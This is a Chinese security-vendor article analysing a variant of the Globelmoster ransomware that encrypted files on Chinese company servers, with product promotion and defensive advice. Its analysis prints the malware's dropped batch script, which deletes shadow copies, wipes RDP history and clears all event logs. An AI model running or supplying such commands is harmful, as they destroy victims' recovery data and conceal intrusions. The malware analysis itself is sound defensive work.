“Globelmoster”勒索病毒变种来袭 国内企业已被感染
发布时间:2021-03-31 02:19:52
“Globelmoster”勒索病毒变种来袭 国内企业已被感染

  2017年7月19日,国内网友在安全论坛上反馈,自己的服务器中了勒索病毒,所有的文件均被加密,文件后缀名被修改为“skunk”。经瑞星安全专家调查分析发现是感染了Ransom.Globelmoster勒索病毒。

“Globelmoster”勒索病毒变种来袭 国内企业已被感染

  瑞星安全人员表示,此病毒早在7月10日便已收录进瑞星病毒库,瑞星所有安全产品只要将版本升级到最新便可对其拦截。同时,作为全球首创的可以拦截已知和未知勒索病毒的“瑞星之剑”无需升级便可直接对其进行拦截。

“Globelmoster”勒索病毒变种来袭 国内企业已被感染

“Globelmoster”勒索病毒变种来袭 国内企业已被感染

  瑞星安全人员介绍,此次网友反馈的勒索病毒事件可能是用户的服务器存在漏洞或是弱口令,被黑客拿到了管理员权限,然后植入该病毒。因此,广大企业用户应谨慎对待,避免遭受勒索病毒攻击。可在服务器中安装瑞星之剑,既可以防御病毒攻击,同时不会对服务器造成任何影响。

  “瑞星之剑”是瑞星全球首创针对已知与未知勒索病毒的防御软件,既不影响正常工作又不影响系统性能,用户无需进行关闭系统正常服务端口、打补丁、开启防火墙等操作,便可实现全防御的效果,可供广大政府、企业和有定制化业务系统的用户直接使用。

  “Globelmoster”勒索病毒变种详细分析

  1、病毒运行后从资源中解密出加密生成文件的后缀名,和提示文件名

“Globelmoster”勒索病毒变种来袭 国内企业已被感染

  2、将自身拷贝到%appdata%\Microsoft\SystemCertificates\My\Certificates\目录中

  3、释放批处理文件并执行

  @echo off

  vssadmin,赚钱.exe Delete Shadows /All /Quiet

  reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f

  reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f

  reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"

  cd %userprofile%\documents\

  attrib Default.rdp -s -h

  del Default.rdp

  for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"

  4、结束指定进程

“Globelmoster”勒索病毒变种来袭 国内企业已被感染

  5、跳过指定路径不加密

“Globelmoster”勒索病毒变种来袭 国内企业已被感染

  6、全盘加密文件

“Globelmoster”勒索病毒变种来袭 国内企业已被感染

  7、生成提示页面

“Globelmoster”勒索病毒变种来袭 国内企业已被感染

  8、总结

  论坛用户反馈的病毒样本就为一存粹加密器,没有感染模块。用户服务器中毒有可能是服务器上面存在漏洞或者弱口令,被黑客种植该样本勒索。

  9、防御方法

  自查服务器,看服务器上面提供的服务是否存在漏洞,服务器系统补丁保持更新,定期修改管理员账号密码,安装瑞星之剑和防病毒软件定期扫描病毒。